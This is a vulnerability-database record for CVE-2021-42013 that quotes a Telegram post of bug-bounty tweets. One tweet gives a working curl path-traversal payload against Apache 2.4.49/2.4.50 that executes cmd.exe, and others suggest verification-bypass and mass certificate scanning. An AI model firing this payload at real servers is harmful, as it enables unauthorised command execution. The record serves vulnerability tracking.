{"uuid": "aa587a5a-78da-4b64-8d51-cd38e89bc56d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42013", "type": "seen", "source": "https://t.me/bhhub/590", "content": "#BugBountyTips of the Day\nCVE-2021-42013 - Apache 2.4.49/2.4.50 - Path Traversal by nvn1729  \"It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient\" -  https://t.co/AK4CQpDGA4  Nuclei Template -  https://t.co/SOY8iTU8Bk  #hackwithautomation #bugbounty #appsec #pentest  https://t.co/dH7StiF3Sd\n---\nWait What? \ud83d\udd25 Apache CVE 2021-41773  One Liner Windows Box: \u2705  curl -sk \u2014path-as-is \" http://host/cgi-bin/.%2e/.%2e/.%2e/.%2e/Windows/System32/cmd.exe?/c+calc.exe\"  #infosec #bugbounty #Apache #cve\n---\n\ud83d\udd25\ud83e\udd11\ud83e\udd11 Neat bug bounty I just got. You can hack Google and use their API to make their search engine search for things:  curl  https://t.co/DQV3mlvADS{QUERY HERE}  Nice little \u00a320,160 bounty! Thank you \ud83d\ude3b\ud83d\ude3b  All public APIs are vulns \u26a1\u26a1\u26a1  Follow for more #bugbounty tips!  https://t.co/GBiv7j8nhK\n---\nSo I reported a RCE to a domain owned by IBM (@Hacker0x01 program) . It was Triaged and now closed as informative because the servers are owned by Amazon.  Scope rules say 'domains owned by IBM'  Imagine all companies use this excuse. \ud83d\ude02 \ud83d\ude02  #bugbountytips #BugBounty\n---\nAlways test JSON body parameters. In my case I bypassed email verification.  #bugbountytips  https://t.co/pDzPfkJOl7\n---\nExpand your attack surface by grabbing SSL certificates from ip addresses, match these with your Bug Bounty targets.  I'd recommend running this technique on cloud providers such as AWS/Azure/GCP ranges  using  https://t.co/uvvFVrKTXC  cero [CIDR] (cero 0.0.0.0/0)  #bugbountytips", "creation_timestamp": "2021-10-08T13:37:04.000000Z"}